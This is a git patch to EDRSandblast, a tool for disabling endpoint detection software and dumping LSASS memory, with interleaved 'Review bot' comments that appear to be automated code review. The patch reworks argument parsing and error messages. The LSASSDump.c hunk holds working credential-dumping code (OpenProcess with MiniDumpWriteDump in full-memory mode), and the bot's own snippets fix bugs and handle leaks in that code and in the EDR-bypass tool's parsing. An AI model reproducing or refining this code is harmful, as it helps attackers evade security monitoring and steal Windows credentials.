From d29986ab806df73ac98880a2b8136f8a2976548e Mon Sep 17 00:00:00 2001
From: Maxime Meignan
Date: Mon, 17 Jan 2022 17:13:47 +0100
Subject: [PATCH] Improved error verbosity
---
 EDRSandblast/EDRSandBlast.h | 3 ++-
 EDRSandblast/EDRSandblast.c | 45 ++++++++++++++++++++--------------
 EDRSandblast/Utils/LSASSDump.c | 32 +++++++++---------------
 Offsets/ExtractOffsets.py | 9 +++++--
 4 files changed, 48 insertions(+), 41 deletions(-)
diff --git a/EDRSandblast/EDRSandBlast.h b/EDRSandblast/EDRSandBlast.h
index 1f28085..9e4d2c3 100644
--- a/EDRSandblast/EDRSandBlast.h
+++ b/EDRSandblast/EDRSandBlast.h
@@ -4,5 +4,6 @@ typedef enum _START_MODE {
 dump,
 cmd,
 credguard,
- audit
+ audit,
+ none
 } START_MODE;
\ No newline at end of file
diff --git a/EDRSandblast/EDRSandblast.c b/EDRSandblast/EDRSandblast.c
index 4ad624b..62d5319 100644
--- a/EDRSandblast/EDRSandblast.c
+++ b/EDRSandblast/EDRSandblast.c
@@ -26,7 +26,7 @@ int _tmain(int argc, TCHAR** argv) {
 // Parse command line arguments and initialize variables to default values if needed.
- const TCHAR usage[] = TEXT("Usage: EDRSandblast.exe [-h | --help] [-v | --verbose] [--usermode [--unhook-method ]] [--kernelmode] [--dont-unload-driver] [--dont-restore-callbacks] [--driver ] [--service ] [--nt-offsets ] [--wdigest-offsets ] [--add-dll ]* [-o | --dump-output ]");
+ const TCHAR usage[] = TEXT("Usage: EDRSandblast.exe [-h | --help] [-v | --verbose] [--usermode [--unhook-method ]] [--kernelmode] [--dont-unload-driver] [--dont-restore-callbacks] [--driver ] [--service ] [--nt-offsets ] [--wdigest-offsets ] [--add-dll ]* [-o | --dump-output ]");
 const TCHAR extendedUsage[] = TEXT("\n\
 -h | --help Show this help message and exit.\n\
 -v | --verbose Enable a more verbose output.\n\
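Review bot: `none` is appended as the last enumerator, so a zero-initialised START_MODE still reads as `dump` (the first enumerator, value 0) rather than as "no action selected"; declaring it first, `none = 0,` ahead of `dump,`, would make the sentinel the natural default of a zeroed variable while leaving the explicit `startMode = none` initialisation in EDRSandblast.c equivalent. The existing enumerators are unprefixed too, so the new name is consistent with them, but all five are now plain C identifiers in the global namespace. The typedef lies entirely inside the hunk.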
@@ -94,21 +94,7 @@ Other options:\n\
 return EXIT_FAILURE;
 }
- START_MODE startMode;
- if (_tcsicmp(argv[1], TEXT("dump")) == 0) { startMode = dump; }
- else if (_tcsicmp(argv[1], TEXT("cmd")) == 0) { startMode = cmd; }
- else if (_tcsicmp(argv[1], TEXT("credguard")) == 0) { startMode = credguard; }
- else if (_tcsicmp(argv[1], TEXT("audit")) == 0) { startMode = audit; }
- else if (_tcsicmp(argv[1], TEXT("-h")) == 0 || _tcsicmp(argv[1], TEXT("--help")) == 0) {
- _tprintf(TEXT("%s\n"), usage);
- _tprintf(TEXT("%s\n"), extendedUsage);
- return EXIT_SUCCESS;
- }
- else {
- _tprintf(TEXT("%s"), usage);
- return EXIT_FAILURE;
- }
-
+ START_MODE startMode = none;
 TCHAR driverPath[MAX_PATH * 2] = { 0 };
 TCHAR driverDefaultName[] = TEXT("RTCore64.sys");
 TCHAR ntoskrnlOffsetCSVPath[MAX_PATH * 2] = { 0 };
@@ -127,8 +113,24 @@ Other options:\n\
 hook* hooks = NULL;
- for (int i = 2; i < argc; i++) {
- if (_tcsicmp(argv[i], TEXT("-h")) == 0 || _tcsicmp(argv[i], TEXT("--help")) == 0) {
+ for (int i = 1; i < argc; i++) {
+ if (_tcsicmp(argv[i], TEXT("dump")) == 0) {
+ startMode = dump;
+ }
+ else if (_tcsicmp(argv[1], TEXT("cmd")) == 0) {
+ startMode = cmd;
+ }
+ else if (_tcsicmp(argv[1], TEXT("credguard")) == 0) {
+ startMode = credguard;
+ }
+ else if (_tcsicmp(argv[1], TEXT("audit")) == 0) {
+ startMode = audit;
+ }
+ else if (_tcsicmp(argv[1], TEXT("-h")) == 0 || _tcsicmp(argv[1], TEXT("--help")) == 0) {
+ _tprintf(TEXT("%s\n"), usage);
+ _tprintf(TEXT("%s\n"), extendedUsage);
+ return EXIT_SUCCESS;
+ } else if (_tcsicmp(argv[i], TEXT("-h")) == 0 || _tcsicmp(argv[i], TEXT("--help")) == 0) {
 _tprintf(TEXT("%s\n"), usage);
 _tprintf(TEXT("%s\n"), extendedUsage);
 return EXIT_SUCCESS;
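Review bot: The new mode-dispatch chain tests `argv[1]` instead of `argv[i]` in the `cmd`, `credguard`, `audit` and first `-h` branches, so those modes are only recognised in the first position, and whenever argv[1] is one of them every later iteration re-matches it and reassigns startMode before the option parsing further down is reached — `EDRSandblast.exe cmd --kernelmode` would leave kernelMode unset and then fail the "'cmd' mode needs kernel-land unhooking" check. The `-h`/`--help` test is also duplicated: the `else if` that follows already does the same thing on `argv[i]`. Replacing `argv[1]` with `argv[i]` in those four branches and dropping the duplicate help branch fixes both; a `startMode != none` guard before each assignment would additionally reject two mode words on one command line instead of silently keeping the last. `_tmain` starts and ends outside the hunk.
```c
for (int i = 1; i < argc; i++) {
    if (_tcsicmp(argv[i], TEXT("dump")) == 0) {
        startMode = dump;
    }
    else if (_tcsicmp(argv[i], TEXT("cmd")) == 0) {
        startMode = cmd;
    }
    else if (_tcsicmp(argv[i], TEXT("credguard")) == 0) {
        startMode = credguard;
    }
    else if (_tcsicmp(argv[i], TEXT("audit")) == 0) {
        startMode = audit;
    }
    else if (_tcsicmp(argv[i], TEXT("-h")) == 0 || _tcsicmp(argv[i], TEXT("--help")) == 0) {
        _tprintf(TEXT("%s\n"), usage);
        _tprintf(TEXT("%s\n"), extendedUsage);
        return EXIT_SUCCESS;
    }
    // … unchanged: remaining option parsing …
```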
@@ -215,6 +217,10 @@ Other options:\n\
 }
 // Command line option consistency checks.
+ if (startMode == none){
+ _tprintf(TEXT("[!] You did not provide an action to perform: audit, dump, credguard or cmd\n"));
+ return EXIT_FAILURE;
+ }
 if (startMode == cmd && !kernelMode) {
 _tprintf(TEXT("'cmd' mode needs kernel-land unhooking to work, please enable --kernelmode\n"));
 return EXIT_FAILURE;
@@ -229,6 +235,9 @@ Other options:\n\
 if (startMode == dump && !kernelMode) {
 _tprintf(TEXT("[!] LSASS dump might fail if RunAsPPL is enabled. Enable --kernelmode to bypass PPL\n"));
 }
+ if (!userMode && kernelMode) {
+ _tprintf(TEXT("[!] If kernel mode bypass is enabled, it is recommended to enable usermode bypass as well (e.g. to unhook the NtLoadDriver API call)\n"));
+ }
 BOOL isSafeToExecutePayload = TRUE;
diff --git a/EDRSandblast/Utils/LSASSDump.c b/EDRSandblast/Utils/LSASSDump.c
index 144a1c5..8188f7e 100644
--- a/EDRSandblast/Utils/LSASSDump.c
+++ b/EDRSandblast/Utils/LSASSDump.c
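Review bot: `if (startMode == none){` omits the space before the opening brace that every neighbouring check in this block uses (`if (startMode == cmd && !kernelMode) {`); `if (startMode == none) {` keeps the file's formatting consistent. The check itself is correctly placed after the argument loop, since the `-h` branch returns before it is reached. `_tmain` starts and ends outside the hunk.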
@@ -70,32 +70,24 @@ DWORD WINAPI dumpLSASSProcess(void* data) {
 continue;
 }
- // Retrieve the priority class.
- dwPriorityClass = 0;
 hProcess = OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE, pe32.th32ProcessID);
 if (hProcess == NULL || hProcess == INVALID_HANDLE_VALUE) {
- _tprintf(TEXT("[!] LSASS dump failed: couldn't open lsass memory (OpenProcess)\n"));
+ _tprintf(TEXT("[!] LSASS dump failed: couldn't open lsass memory (OpenProcesswith error 0x%x)\n"), GetLastError());
 return 1;
 }
- else {
- dwPriorityClass = GetPriorityClass(hProcess);
- if (!dwPriorityClass) {
- _tprintf(TEXT("[!] LSASS dump non fatal error: couldn't retrieve LSASS process' priority class (GetPriorityClass)\n"));
- }
- HANDLE hDumpFile = CreateFile(outputDump, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
- if (hDumpFile == INVALID_HANDLE_VALUE) {
- _tprintf(TEXT("[!] LSASS dump failed: couldn't create dump file (CreateFileA)\n"));
- return 1;
- }
- BOOL dumped = MiniDumpWriteDump(hProcess, pe32.th32ProcessID, hDumpFile, MiniDumpWithFullMemory, NULL, NULL, NULL);
- if (!dumped) {
- _tprintf(TEXT("[!] LSASS dump failed: couldn't dump LSASS process (MiniDumpWriteDump)\n"));
- return 1;
- }
- _tprintf(TEXT("[+] LSASS sucessfully dump to: %s\n"), outputDump);
- CloseHandle(hProcess);
+ HANDLE hDumpFile = CreateFile(outputDump, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
+ if (hDumpFile == INVALID_HANDLE_VALUE) {
+ _tprintf(TEXT("[!] LSASS dump failed: couldn't create dump file (CreateFileA)\n"));
+ return 1;
 }
+ BOOL dumped = MiniDumpWriteDump(hProcess, pe32.th32ProcessID, hDumpFile, MiniDumpWithFullMemory, NULL, NULL, NULL);
+ if (!dumped) {
+ _tprintf(TEXT("[!] LSASS dump failed: couldn't dump LSASS process (MiniDumpWriteDump with error 0x%x)\n"), GetLastError());
+ return 1;
+ }
+ _tprintf(TEXT("[+] LSASS sucessfully dump to: %s\n"), outputDump);
+ CloseHandle(hProcess);
 } while (Process32Next(hProcessSnap, &pe32));
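Review bot: `hDumpFile` is never closed on any path of the rewritten block — the success path only calls `CloseHandle(hProcess)`, and the two `return 1` exits after `CreateFile` and `MiniDumpWriteDump` leak `hProcess` (and, for the second, `hDumpFile`) as well; since the block is being restructured anyway, closing both handles on every exit is cheap, with `GetLastError()` read before the `CloseHandle` calls so the reported code is the one from the failing call. The new OpenProcess message is also missing a space: `(OpenProcess with error 0x%x)`. With the `dwPriorityClass` assignments removed here, its declaration (outside the hunk) is presumably unused now and may warn. `dumpLSASSProcess` starts and ends outside the hunk.
```c
HANDLE hDumpFile = CreateFile(outputDump, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hDumpFile == INVALID_HANDLE_VALUE) {
    _tprintf(TEXT("[!] LSASS dump failed: couldn't create dump file (CreateFile with error 0x%x)\n"), GetLastError());
    CloseHandle(hProcess);
    return 1;
}
BOOL dumped = MiniDumpWriteDump(hProcess, pe32.th32ProcessID, hDumpFile, MiniDumpWithFullMemory, NULL, NULL, NULL);
// Capture the error before CloseHandle can overwrite the thread's last-error value.
DWORD dumpError = dumped ? ERROR_SUCCESS : GetLastError();
CloseHandle(hDumpFile);
CloseHandle(hProcess);
if (!dumped) {
    _tprintf(TEXT("[!] LSASS dump failed: couldn't dump LSASS process (MiniDumpWriteDump with error 0x%x)\n"), dumpError);
    return 1;
}
_tprintf(TEXT("[+] LSASS sucessfully dump to: %s\n"), outputDump);
```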
diff --git a/Offsets/ExtractOffsets.py b/Offsets/ExtractOffsets.py
index ca82521..e3e7761 100644
--- a/Offsets/ExtractOffsets.py
+++ b/Offsets/ExtractOffsets.py
@@ -225,13 +225,18 @@ if __name__ == '__main__':
 help='Flag to download the PE from Microsoft servers using list of versions from winbindex.m417z.com.')
 args = parser.parse_args()
- mode = args.mode
+ mode = args.mode.lower()
 if mode not in knownImageVersions:
 print(f'[!] ERROR : unsupported mode "{args.mode}", supported mode are: "ntoskrnl" and "wdigest"')
 exit(1)
 # check R2 version
- output = run(["r2", "-V"], capture_output=True).stdout.decode()
+ r = run(["r2", "-V"], capture_output=True)
+ if r.returncode != 0:
+ print(f"Error: the following error message was printed while running 'r2 -V':")
+ print(r.stderr)
+ exit(r.returncode)
+ output = r.stdout.decode()
 ma,me,mi = map(int, output.splitlines()[0].split(" ")[0].split("."))
 if (ma, me, mi) < (5,0,0):
 print("WARNING : This script has been tested with radare2 5.0.0 (works) and 4.3.1 (does NOT work)")
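Review bot: `print(r.stderr)` on the new error path prints a bytes object (`run` is called without `text=True`), so the user sees `b'...'` with escaped newlines rather than radare2's message; decode it the way `output` is decoded two lines later, `print(r.stderr.decode(errors="replace"))`. The check also only covers a non-zero exit status: if `r2` is not on PATH, `run` raises FileNotFoundError before `returncode` is ever inspected, which is the likelier failure for a version probe. The f-string on the first print has no placeholders and can be a plain string. The `if __name__ == '__main__':` block starts and ends outside the hunk.
```python
    # check R2 version
    try:
        r = run(["r2", "-V"], capture_output=True)
    except FileNotFoundError:
        print("Error: 'r2' was not found in PATH; radare2 is required to extract offsets")
        exit(1)
    if r.returncode != 0:
        print("Error: the following error message was printed while running 'r2 -V':")
        print(r.stderr.decode(errors="replace"))
        exit(r.returncode)
    output = r.stdout.decode()
    # … unchanged: version comparison …
```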